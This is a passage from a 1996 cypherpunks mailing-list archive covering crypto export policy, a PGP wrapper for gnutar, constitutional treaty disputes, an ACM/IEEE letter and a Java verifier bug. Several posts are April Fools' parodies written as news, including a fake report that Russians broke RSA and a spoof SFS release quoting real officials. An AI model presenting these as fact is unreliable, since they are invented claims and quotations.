be using my identity to read et--it obfuscates any tracking of my reading
habits they may be doing--so i'll just ask folks to not tell me if they do.

richard

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWAQpR1gtCYLvIJ1AQGEHwP/dzTNcc1FcWz4ydKMX5MctyWfjBf82ka+
qSZenBZ4tjgCYCbyTDFYG/Hx3c0y5NTpwskTVwzCkZ7RFvVwAFFSsPOGrHSAAA09
b6FiC1Vvct3XJg3mjDlZhImiF04LKI2oPcsHAHmNhOomjK+tdJtN3Wuwhs6fvv90
pW17rnxvZ5o=
=IqxK
-----END PGP SIGNATURE-----

-- 
Richard Martin                                   [not speaking for a|w]
rmartin@aw.sgi.com                   http://reality.sgi.com/rmartin_aw/
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 2 Apr 1996 20:27:47 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Electronic locksmiths are watching you (Belgium's ban onPGP)
Message-ID: <m0u3qOi-0008xjC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:56 PM 4/1/96 -0500, Black Unicorn wrote:
>
>Following my new policy on Jim Bell posts, the below represents my new 
>form of reply.  These 'terse' replies should cut down on bandwidth and 
>still serve as some basic protection to the list readership as to the 
>mis and dis-information which eminates in quantity from Mr. Bell's 
>account.  Those parties interested in a more detailed discussion, aside 
>of course Mr. Bell, should ask for clarification where they feel it 
>necessary and I will then expound on my points.

What you _really_ ought to do is to cut down your responses to ZERO, 
especially on material that was not sent to you.  Until you're willing to 
talk intelligently about what you believe, you're just wasting peoples' time.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 2 Apr 1996 19:22:45 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Russians Break RSA?
In-Reply-To: <ad856eda0f021004dc93@[205.199.118.202]>
Message-ID: <Pine.SUN.3.92.960401123731.4311A-100000@elaine17.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This is true. I read about it in The Spotlight. Or was it libernet?

-rich
 Visit Propaganda on the Barbie!
 http://www-leland.stanford.edu/~llurch/potw2/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 2 Apr 1996 15:18:59 +0800
To: cypherpunks@toad.com
Subject: (fwd) Russians Break RSA?
Message-ID: <ad856eda0f021004dc93@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Friends,

I just grabbed this of the ClariNet news feed on Netcom...I'm not
supposed to forward anything from this service (so don't tell Brad
Templeton!), but this appeared to be too important not to pass on as
quickly as possible.

Apparently those rumors that the Russians, always topnotch
mathematicians, had developed public key crypto in the 1950s or early
60s are true--my hero Kolmogorov developed this when he was technical
director at Kryptogorodok, the secret city of Soviet cryptographers
hidden in the Urals (and first visited by an outsider, Stephen
Wolfram, only a couple of years ago).

Here's the report on a news conference announcing the cracking of
their Kolmogorov system, which is equivalent to our own RSA. I haven't
had a chance to talk to John Markoff, who was at the press conference,
to get his comments.

--Tim

> Xref: netcom.com clari.world.europe.eastern:2783
> clari.news.hot.ussr:3792
> clari.
> news.trouble:3258 clari.science.crypto
> Path: netcom.com!bass!clarinews
> Approved: doug@clarinet.com
> From: clarinews@clarinet.com (AP)
> Newsgroups:
> clari.world.europe.eastern,clari.news.hot.ussr,clari.news.trouble,clari.sc
> ience.crypto
> Distribution: clari.apo
> Subject: Russian Mathematicians Announce Breakthrough
> Keywords: Europe Cryptography RSA
> Copyright: 1996 by The Associated Press, R
> Message-ID: <russia-cryptoUR7f0_4ME@clarinet.com>
> Date: Mon, 1 Apr 96 10:40:19 PST
> Expires: Mon, 7 Apr 96 12:40:19 PDT
> ACategory: international
> Slugword: Russia-Crypto
> Priority: regular
> ANPA: Wc: 116/0; Id: V0255; Src: ap; Sel: -----; Adate: 03-14-N/A
> Codes: APO-1103
>
>
>         MOSCOW (AP) -- At a press conference held minutes ago in a
> crowded hall, Russian mathematicians announced that a breakthrough had
> been made nearly a decade ago in the arcane branch of mathematics
> known as "cryptography," the science of making messages that are
> unreadable to others.
>         Leonid Vladwylski, Director of the prestigious Moscow Academy
> of Sciences, called the press conference yesterday, after rumors began
> circulating that noted Russian-American reporter John Markoff was in
> Russia to interview academicians at the previously secret city of
> Soviet cryptographers, Kryptogorodok. The existence of Kryptogorodok,
> sister city to Akademogorodok, Magnetogorsk, and to the rocket cities
> of Kazhakstan, had been shrouded in secrecy since its establishment in
> 1954 by Chief of Secret Police L. Beria. Its first scientific
> director, A.  Kolmogorov, developed in 1960 what is called in the West
> "public key cryptography." The existence of Kryptogorodok was unknown
> to the West until 1991, when Stephen Wolfram disclosed its existence.
>         American cryptographers initially scoffed at the rumors that
> the Russians had developed public-key cryptography as early as 1960,
> some 15 years prior to the first American discovery. After interviews
> last year at Kryptogorodok, noted American cryptographers Professor
> D. Denning and D. Bowdark admitted that it did seem to be
> confirmed. Professor Denning was quoted at the time saying that she
> did not think this meant the Russians could actually break the
> Kolmogorov system, known in the West as RSA, because she had spent
> more than a full weekend trying to do this and had not
> succeeded. "Believe me, RSA is still unbreakable," she said in her
> evaluation report.
>         Russia's top mathematicians set out to break Kolmogorov's new
> coding system. This required them to determine that "P = NP" (see
> accompanying article). Details are to be published next month in the
> journal "Doklady.Krypto," but a few details are emerging.
>         The Kolmogorov system is broken by computing the prime numbers
> which form what is called the modulus. This is done by randomly
> guessing the constituent primes and then detonating all of the
> stockpiled nuclear weapons in the former Soviet Union for each "wrong
> guess." In the Many Worlds Interpretation of quantum mechanics,
> invented in 1949 by Lev Landau (and later, independently by Everett
> and Wheeler in the U.S.), all possible outcomes of a quantum
> experiment are realized.
>          As Academician Leonid Vladwylski explained, "In all the
> universes in which we guessed the wrong factors, we were destroyed
> completely. But since we are obviously here, talking to you at this
> press conference, in this universe we have an unbroken record of
> successfully factoring even the largest of imaginable numbers. Since
> we are so optimistic about this method, we say the computation runs in
> "Nondeterministic Pollyanna Time." Allow me to demonstrate..."
>
> [Press Conference will be continued if the experiment is a success.]
>
> MOSCOW (AP), ITAR-Tass, 1 April 1996
>
>
>



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Hayward <haywire@haywire.org>
Date: Tue, 2 Apr 1996 20:01:40 +0800
To: pgp-bugs@MIT.EDU
Subject: gnutar + pgp filter mode
Message-ID: <199604012131.NAA05812@mach3.directnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The gnu tar archiver allows to use an arbitrary
compression program (option --use-compress-program=PROG).

This works well with pgp if a small wrapper is used:

#!/bin/csh -fb

if ("$1" == "-d") then
  exec pgp -d -f
else
  exec pgp -e -f
endif




The only problem is that this doesn't work well for
larger amounts of data, because pgp reads in all
data before starting with its work.


Perhaps a future release of pgp will have a real filter
mode.


Hadmut

BTW: Does this "crypto-hook" cause export restrictions to 
apply on gtar ?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMV/0tmc1jG5vDiNxAQFtAAP/TMuYeYf5q7k1Y8DrBjb6XFKYYFANH3RH
FvThWq1BUgI+unH97EZkNkCzZJYT5qmLGk3+JLufCAw/o9YR7jKcldm2LNYJ96t2
BDcSGDF3qx/IUzQBa5NV+gUerNRVSwA3LzkTbXufOxYH0cB3KNcsx3B0bE1rEDa/
GCcJ1L6T+2s=
=FMiZ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 2 Apr 1996 19:56:44 +0800
To: cypherpunks@toad.com
Subject: RE: Witch hunt
Message-ID: <199604012154.NAA00130@well.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: "Vladimir Z. Nuri" <vznuri@netcom.com>

>Tim May == Rousseau??? hehehehehe. and I fail to comprehend how
>anyone so universally despised as Detweiller could be considered
>to have employed any "effective critical technique". maybe I
>should send him some email, but alas I perceive that to be another
>waste of time.


 Send HIM some E-mail? That's pretty funny Larry! What happened,
someone sever your Corpus Callosum?

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 2 Apr 1996 15:26:20 +0800
To: cypherpunks@toad.com
Subject: Navajo code-talkers
Message-ID: <199604012155.NAA00640@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May comments:

>According to an episode of "The X Files," which dealt with Navajo
>code-talkers, the answer is that young Navajo men are losing their
>fluency in Navajo, especially of the nuances and double entendres
>that code-talkers relied upon. (For those who scoff at using a
>television show as a source, writers for shows like this often do
>more interesting research than, say, the average encyclopedia
>article will report.)

 Navajo also has something now it didn't have before WWII, a
written language, and I believe a rudimentary dictionary.

Brian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 2 Apr 1996 15:23:11 +0800
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: gnutar + pgp filter mode
In-Reply-To: <199604011522.RAA09571@elysion.eiss.ira.uka.de>
Message-ID: <199604011916.OAA18585@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The only problem is that this doesn't work well for
> larger amounts of data, because pgp reads in all
> data before starting with its work.
> 
> Perhaps a future release of pgp will have a real filter
> mode.

The problem is not with PGP but with the PGP message formatsa.  With
the current message formats you need to know the size of data before
you can output the header that precedes it.  As a result, whole
messages must somehow be buffered before PGP can output them.

The fix is to create new, one-pass packets, which will allow PGP to
generate messages in a single pass.  These new packet formats are
still in the design stage and will probably not be supported in PGP
3.0.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Tue, 2 Apr 1996 20:46:36 +0800
To: Carl Ellison <cme@acm.org>
Subject: Re: "Random Sequence"
Message-ID: <v02130502ad85efd99ac3@[204.134.0.172]>
MIME-Version: 1.0
Content-Type: text/plain


>At 07:25 AM 3/31/96 -0700, Rollo Silver wrote:
>>The paper "On the Effective Definition of 'Random Sequence'", by Michael
>>Levin, Marvin Minsky, and Roland Silver can be viewed (and downloaded, and
>>printed) from my website <http://www.artvark.com/artvark>.
>
>Rollo,
>
>        I read the paper and it's nice work -- but it departs from current
>definitions of random sequences in that it assumes you specify the countable
>set of machines trying to test for non-randomness first and then generate a
>sequence to fool that set of machines.  Current definitions of randomness
>assume an infinite set of testing machines, often limited to polynomial time
>and space, and a sequence generator that must defeat them all without
>knowing anything about them.  Such sequences are, in a sense, "more random"
>than the ones your paper dealt with -- I believe.  Did I miss something?

* It's a bit anachronistic to say in 1996 that a paper written 30 years
earlier "departs from current definitions of random sequences." The authors
may have been brilliant, but they weren't prescient. <g>

I can't imagine how a computer could be smart enough to defeat an infinite
set of guessing machines without knowing ANYTHING about them. In fact,
what's wrong with this argument: call the "fooling" machine Frank, and one
of the "guessing" machine Gert. You say that Frank doesn't need to know
anything about Gert. Let me suppose however that Gert DOES know about
Frank. In that case, Gert can simulate Frank and "guess" his output, thus
foiling Frank's attempts to fool Gert!

Maybe it's the "polynomial time & space". That restricts the guesser-domain
considerably, compared with our very weak requirement that the guessers can
be any Turing machines whatever -- as long as the set of them is
effectively calculable.

BTW, is the set of ALL finite automata effectively calculable? I suspect
maybe so. If so, by essentially the argument given in the paper, there is a
computer (Turing machine) that can fool them ALL.

I hope it's okay to cc this note to coderpunks. It's not about coding per
se, but it may shed some light on what "randomness" means, and on
"computable randomness", which sounds appropriate for coderpunks to me.

------------------------------------------------------------------------
Rollo Silver      | The CDA means  | Artvark / PO Box 219
505-586-0197      | lost jobs and  | San Cristobal, NM 87564 USA
rollo@artvark.com | dead teenagers | http://www.artvark.com/artvark/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 2 Apr 1996 16:40:07 +0800
To: cypherpunks@toad.com
Subject: Re: NYT on CFP
Message-ID: <m0u3s9n-0008zMC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:24 AM 4/1/96 -0500, John Young wrote:
>   The New York Times, April 1, 1996, p. A14.
>   Pioneers of Cyberspace Move Into Wider Arena,  By Peter H. Lewis
   Cambridge, Mass., March 30 -- Cyberspace is dead, many of
>   its electronic pioneers said at a conference here this
>   week.

[stuff deleted]

>   The proposals include the formation of
>   an Internet Caucus in Congress and a Senate blll to relax
>   the Government's laws restricting the transmission of
>   secrets over the global information network.

This goes to show that export controls on encryption are going to have to 
go, Leahy bill or not.

>   "Washington is coming to thls conference in droves," said
>   Daniel J. Weltzner, deputy dlrector of the Center for
>   Democracy and Technology, one of several public-interest
>   groups that seek to influence Government policy related to
>   cyberspace, "and I think it's very exciting and promising.
>   It's the coming of age of this community."

I don't think they have any choice!  Washington is already bombarded with 
email within hours every time they do something stupid.  

>   The Computers, Freedom and Privacy crowd included its usual
>   assortment of computer hackers, academics and self-
>   described crypto-anarchists, and even one man wearing video
>   goggles with an antenna apparently sprouting from his head.
>   But it also included others who wanted to assess the fusion
>   of cyberspace and real space: Federal judges, lawmakers,
>   White House policy experts, corporate executives and
>   law-enforcement agents.

Some of whom might even be aware that they could easily lose their jobs as a 
consequence of what's happening now on the 'net.

>   Senator Conrad Burns, a Republican from the real frontier
>   state of Montana, chose the conference to announce, by
>   telephone, new legislation that would remove nearly all
>   current Government restrictions on the export of
>   mass-market encryption software, which is used to send
>   secret messages over computer and telephone networks.

I sure wish they'd hurry up on this legislation.  Hope it's not just 
vaporware...er... vaporbill, or whatever.

>   Senator Burns's legislation would also block the
>   Administration from imposing as a Government standard any
>   form of data encryption that would give law-enforcement
>   agencies the ability to decode messages.

Gee, I thought the 1st amendment did that?  Are our freedoms dependant on a 
bill that hasn't yet been passed, and may not even yet exist?

>   The Senator's bill places him squarely at odds with the
>   Clinton Administration and the Justice Department. But Mr.
>   Burns said the use of robust data encryption would foster
>   the rise of electronic commerce, distance education and
>   digital communicatlons, which his large, rural state
>   desperately needs in the 21st century. While the bill might
>   have little chance of passage this year, conference
>   participants were heartened by what appears to be growing
>   support in Congress for a relaxation of the Government's
>   cryptography policy.

I'm anxious to see how many self-proclaimed supporters of the Leahy bill are 
going to do the right thing and drop their support of it once the text of 
this Burns bill has been released.  (assuming the Burns bill turns out 
to be satisfactory, of course, and that it covers all the "good" parts that 
we wanted from Leahy as well as leaving out all the bad ones.)  

Though I was never happy about that "list of shame" idea,  one of the tests 
that would partially confirm or deny the proper placement of any given name 
on that list would be that the person named would shift his support to a 
repaired bill.  I can't see any logical reason to continue to support a 
flawed bill if and when a corrected bill appears.


>   The proposal drew some opposition. "I think we'll regret it
>   down the road," said Dorothy E. Denning, a professor of
>   computer sciences at Georgetown University and a computer
>   security consultant to the military. Dr. Denning and others
>   have argued that the use of unrestricted encryption would
>   thwart the ability of law-enforcement and intelligence
>   agencies to conduct wiretaps on messages sent by foreign
>   spies, terrorists, child pornographers and other criminals.

Damn!  They keep leaving me out of their short list!  Maybe they meant to 
lump me in with the groups they mentioned.  I'm an American, so I can't be a 
"foreign spy," and my supply of child pornography is at a constant zero 
level.   I'd sure hate to be lumped into an ignominious position with the 
"other criminals," however:  What an unimpressive title!

Maybe I'll just have to settle for being called a terrorist. Harrumph!

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 2 Apr 1996 16:11:01 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Electronic locksmiths are watching you (Belgium's ban onPGP)
In-Reply-To: <m0u3YEC-0008x8C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960401144716.21891A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Following my new policy on Jim Bell posts, the below represents my new 
form of reply.  These 'terse' replies should cut down on bandwidth and 
still serve as some basic protection to the list readership as to the 
mis and dis-information which eminates in quantity from Mr. Bell's 
account.  Those parties interested in a more detailed discussion, aside 
of course Mr. Bell, should ask for clarification where they feel it 
necessary and I will then expound on my points.

On Sun, 31 Mar 1996, jim bell wrote:

> I hope by now you've seen my reply about the treaty issue.  I wasn't 
> particularly focussing on the question of what Europe will do qua Europe, 
> but how the treaty issue could be abused in the US.  Here is the section of 
> the US Constitution which is relevant, and which I mentioned  by reference before:
> 
> Article VI
> ...
> 
> This Constitution, and the Laws of the United States which shall be made in 
> Pursuance thereof; and all Treaties made, or which shall be made, under the 
> Authority of the United States, shall be the supreme Law of the land; and 
> the Judges in every State shall be bound thereby, any Thing in the 
> Constituion or Laws of any State to the Contrary notwithstanding.
> ...
> 
> 
> I do not believe that this section was intended to mean that the _citizens_ 
> of the US are bound by treaty obligations;

You are incorrect.

 That would be illogical, treaties 
> are agreements between governments. Treaties are inherently intended to 
> govern relations with foreign countries, not legal or political 
> circumstances within a particular country.  Treaties may AFFECT citizens, 
> such as extradition treaties, immigration/emigration treaties, and passport 
> requirements, but the citizen doesn't "agree" with them. 

You are, again, incorrect.

> That's evidenced by the fact that treaties are ratified by only the US 
> Senate, the body with two Senators from each state.  (The House has 
> proportional representation, based on the population of each state.)  The 
> intent, I suggest, was that treaties were supposed to be interpreted as 
> applying to the country, while laws applied to the individual.

You need to study the history of this structural decision.

> (Since you're Canadian, and for other non-US readers, I should point out 
> that when the US Constitution was being drafted and debated,

[Yadda yadda yadda.]

> In any case, since laws can be declared unconstitutional I think it's 
> implicit that there can be such a thing as an "unconstitutional treaty," or 
> at least one if declared to be binding on the citizens would be in violation 
> of the Constitution.  If, for example, the US government decided that it 
> wanted to take away free speech rights from its citizens, to name an 
> obviously fantastic example, it could arguably write a treaty with, say, 
> Mexico, "agreeing" that free-speech rights will not apply to the citizens of 
> each country.  

You need to study the difference between non-executing and self-executing 
treaties.  It is left as an exercise to the reader to determine why, in 
this context, what Mr. Bell suggests would not work.

> merely the government.  I believe there was a treaty in the middle 
1960's called 
> something like "Single Issue Treaty on Narcotics" which led directly to a 
> massive re-write of the drug laws in the US.  In view of the fact that 
> today, probably 70% of the inmates in US prisons are there on drug charges, 
> it is obvious that this treaty had a long-lasting internal effect, far 
> beyond what a person might have expected at the time.

Se above reference to self-executing treaties as to why Mr. Bell is again 
passing the wrong mark.

> Whether or not this interpretation could still work in today's changed 

[Yadda yadda yadda].

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Thomlinson" <phantom@u.washington.edu>
Date: Tue, 2 Apr 1996 16:51:36 +0800
To: cypherpunks@toad.com
Subject: PsychicCash IPO
Message-ID: <Pine.OSF.3.92a.960401153024.29879A-100000@saul5.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



PsychicCash(TM) Announces Initial Public Offering


PsychicCash, a leading developer of electronic commerce systems, today
announced that it will sell 4.5 Million shares of common stock at a price
of $25 a share. "This IPO will make me very rich" said co-founder Dan
Thompson, "but of course you already knew that."

PsychicCash pushes secure, thought-driven commerce into the modern world.
PsychicCash is the holder of a number of crucial psychic commerce patents,
including those on psychic blinding, psychic key-exchange, and psychic
anonymity. The PsychicCash technology is based on the idea that there is
no need for paper bills or plastic cards. Instead, a user simply thinks to
exchange money. PsychicCash requires no hardware, and little knowledge of
cryptography, however, it does require doing 1024-bit modular
exponentiation in your head.

"This is the logical progression of things," said PsychicCash supporter
Dionne Warwick. "The use of PsychicCash(TM) to secure transactions should
completely remove consumers' concerns about the safety of psychic
commerce."

Through the use of their patented technology, PsychicCash allows users to
transmit value to any vendor, in any denomination, in any currency. With a
future release of the protocol, a few additional multiplications will
allow PsychicCash users to anonymize either party. The release is
currently on hold due to problems in accidentally revealing (thinking)
blinding factors.

"Psychic debit" technology allows secure transmission of value across time
as well as space. That is, one can deduct amounts from payee's bank
accounts before the idea to purchase has even been conceived.  (A similar
use of this technique overcomes prior art claims on PsychicCash patents by
shifting the date of filing back as far as needed.)

As with all cryptographic solutions, PsychicCash must first get export
approval from the US government for each of its' products. However, an
ingenious system, called telepathic key escrow (TKE), should allow the
company expedited commodities jurisdiction approval. Using TKE, a user
simply thinks his key to the National TKE Center, which will then allow
access to the key only with a court order. Whether or not other countries
will allow the NTKEC to escrow their citizens' keys is still unclear.



For more information:

Tel: 206-936-0123
Within the US and Canada, phone: 1-212-888-8879  fax: 1-212-935-3882
e-mail: sales@psychiccash.mil
for customer and technical support:  think





Matt Thomlinson

University of Washington, Seattle, Washington.
Check my home page -- http://weber.u.washington.edu/~phantom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Tue, 2 Apr 1996 21:05:26 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: (fwd) Russians Break RSA?
In-Reply-To: <ad856eda0f021004dc93@[205.199.118.202]>
Message-ID: <199604012059.PAA14716@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

[ Russians developed PK crypto circa 1960 ]

> >         The Kolmogorov system is broken by computing the prime numbers
> > which form what is called the modulus. This is done by randomly
> > guessing the constituent primes and then detonating all of the
> > stockpiled nuclear weapons in the former Soviet Union for each "wrong
> > guess." In the Many Worlds Interpretation of quantum mechanics,
> > invented in 1949 by Lev Landau (and later, independently by Everett
> > and Wheeler in the U.S.), all possible outcomes of a quantum
> > experiment are realized.

So *that's* how you do quantum cryptography!  Good article, Tim.
Nice day for it too.


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 2 Apr 1996 16:43:02 +0800
To: cypherpunks@toad.com
Subject: Java flaw is in bytecode verifier
Message-ID: <199604020006.QAA21649@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>From http://java.sun.com/sfaq/960327.html:
> Researchers at Princeton recently found an implementation bug in the Java
> bytecode Verifier. The Verifier is a part of Java's runtime system which
> certifies that applets downloaded over the Internet adhere to Java's
> language safety rules. Through a sophisticated attack, a malicious applet
> can exploit this bug to delete a file or do other damage.

This is one of the more worrisome places for a bug to exist.  Much of
Java's security rests in the claim that it can screen for and detect bad
bytecode sequences.  This screening code is extremely critical for Java
security and I am surprised to see that it was implemented in a flawed
manner.

I've been writing Java quite a bit in the last couple of weeks, and I
find that I have crashed my browser, whether Netscape or appletviewer,
many times.  Granted some of my code has been pretty buggy, but it's
still not supposed to crash the browser.  Obviously some of the runtime
checks are not being done properly.  I had expected that the bug would
be in these areas, something like the stack overflows that we have seen
cause problems in the past.  A simple error in the bytecode verifier
(if that is what this really is) seems like a more fundamental security
flaw.

The researchers have still not released full details on the bug, although
they had planned to do so by the end of March.  Maybe they are waiting
for the fix to be distributed.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Tue, 2 Apr 1996 15:54:58 +0800
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: ACM/IEEE Letter on Crypto
Message-ID: <n1383746530.3760@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   ACM/IEEE Letter on Crypto


              Association For Computing Machinery
                     Office of US Public Policy
                     666 Pennsylvania Avenue SE
                              Suite 301
                      Washington, DC 20003 USA
              (tel) 202/298-0842 (fax) 202/547-5482

      Institute of Electronics and Electrical Engineers
                     United States Activities
                        1828 L Street NW
                              Suite 1202
                   Washington, DC 20036-5104 USA
              (tel) 202/785-0017 (fax) 202/785-0835

April 2, 1996

Honorable Conrad Burns
Chairman, Subcommittee on Science, Technology and Space
Senate Commerce, Science and Transportation Committee
US Senate SD-508
Washington, DC 20510

Dear Chairman Burns:

	On behalf of the nation's two leading computing and engineering 
associations, we are writing to support your efforts, and the efforts of 
the other cosponsors of the Encrypted Communications Privacy Act, to 
remove unnecessarily restrictive controls on the export of encryption 
technology.  The Encrypted Communications Privacy Act sets out the 
minimum changes that are necessary to the current export controls on  
encryption technology.  However, we believe that the inclusion of issues 
that are tangential to export, such as key escrow and encryption in 
domestic criminal activities, is not necessary.  The relaxation of 
export controls is of great economic importance to industry and users, 
and should not become entangled in more controversial matters.

	Current restrictions on the export of encryption technology harm 
the interests of the United States in three ways: they handicap American 
producers of software & hardware, prevent the development of a secure 
information infrastructure, and limit the ability of Americans using new 
online services to protect their privacy.  The proposed legislation will 
help mitigate all of these problems, though more will need to be done to 
assure continued US leadership in this important hi-tech sector.

	Technological progress has moved encryption from the realm of 
national security into the commercial sphere. Current policies, as well 
as the policy-making processes, should reflect this new reality. The 
legislation takes a necessary first step in shifting authority to the 
Commerce Department and removing restrictions on certain encryption 
products.  Future liberalization of export controls will allow Americans 
to excel in this market.

	The removal of out-dated restrictions on exports will also enable 
the creation of a Global Information Infrastructure sufficiently secure 
to provide seamless connectivity to customers previously unreachable by 
American companies.   The United States is a leader in Internet 
commerce.  However, Internet commerce requires cryptography.  Thus 
American systems have been hindered by cold-war restraints on the 
necessary cryptography as these systems have moved from the laboratory 
to the marketplace.  This legislation would open the market to secure, 
private, ubiquitous electronic commerce.  The cost of not opening the 
market may include the loss of leadership in computer security 
technologies, just at the time when Internet users around the world will 
need good security to launch commercial applications.

	For this legislation to fulfill its promise the final approval of 
export regulations must be based on analysis of financial and commercial 
requirements and opportunities, not simply on the views of experts in 
national security cryptography. Therefore, we urge you to look at ways 
to further relax restrictive barriers.

	Finally, the legislation will serve all users of electronic 
information systems by supporting the development of a truly global 
market for secure desktop communications.  This will help establish 
private and secure spaces for the work of users, which is of particular 
interest to the members of the IEEE/USA and the USACM.

	On behalf of the both the USACM and the IEEE/USA we look forward 
to working with you on this important legislation to relax export 
controls and promote the development of a robust, secure, and reliable 
communications infrastructure for the twenty-first century.

	Please contact Deborah Rudolph in the IEEE Washington Office at 
(202) 785-0017 or Lauren Gelman in the ACM Public Policy Office at (202) 
298-0842 for any additional information.

						
						Sincerely,


						Barbara Simons, Ph.D.3
						Chair, U.S. Public Policy
						Committee of ACM


						Joel B. Snyder, P.E.
						Vice President, Professional Activities and
						Chair, United States Activities Board

cc:	Members of the Subcommittee on 
	Science, Technology and Space
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 1 Apr 1996 17:24:20 +0800
To: cypherpunks@toad.com
Subject: New release of SFS available
Message-ID: <199604010448.QAA25352@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


I have just uploaded version 1.19 of SFS to the grumbo.uwasa.fi FTP site as:

 551004 Apr 01 01:19 grumbo.uwasa.fi:/pc/crypt/sfs119.zip

This release contains a number of major improvements over previous versions.
The most important is that it follows recommendations on the use of encryption
software to be released later today in a joint announcement by the Committee of
Ministers of the Council of Europe and the US State Department.  To this end the
new version of SFS will abandon the use of MDC/SHS in favour of a classified
algorithm which the both NSA and GCHQ are confident will protect non-
confidential data.  Although the exact algorithm details cannot be published
due to its classified nature, it can be revealed that it uses prime number
cycle wheels, a system still employed today at the highest levels.

This algorithm improves on MDC/SHS by using a massive 2048-bit key, which would
take billions of years to exhaust via a brute-force search.  However in order
to satisfy the requirements of various organizations such as the Chinese
government (who need to ensure that no nasty outside influences pollute the
minds of their citizens) and to allow the originators of the 83.5% of all
Usenet traffic which contains porn to be prosecuted (a recent example being the
widely publicised move by the Office of the Bavarian Illuminati to force
Compuserve to drop all sex-related newsgroups), SFS 1.19 will store 2032 bits
of the key in the clear along with the encrypted data.

The head of the FBI Louis Freeh has been quoted as saying that "this will
provide adequate protection against your little sister or your mother, while
allowing law enforcement agencies to investigate people using encryption for
illegal purposes".  The head of the French DSSI agrees: "There have been too
many cases of industrial espionage by foreign government intelligence agencies.
For example in 1993 one such agency acquired over $1 billion worth of business
for their own countries' companies in this manner.  SFS 1.19 will protect
against this problem, while allowing us to maintain control over French
national security interests".

The German government has tentatively approved SFS 1.19 for public use provided
that it undergo a few small changes to comply with an updated form of the the
Fernmeldeanlagen Ueberwachungs-Verordung (FUeV), which will require that all
German users of SFS be connected to a central system to which copies of all
keys used, times of encryption and decryption, identities of users, and copies
of all encrypted data, be automatically forwarded.  The Minister of the
Interior Manfred Kanther stated that "this should fulfil the requirements of
the German government for monitoring possible criminal use, although I might
change my mind about this in a minute or two".

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 2 Apr 1996 10:05:03 +0800
To: pgp-bugs@MIT.EDU
Subject: gnutar + pgp filter mode
Message-ID: <199604011522.RAA09571@elysion.eiss.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The gnu tar archiver allows to use an arbitrary
compression program (option --use-compress-program=PROG).

This works well with pgp if a small wrapper is used:

#!/bin/csh -fb

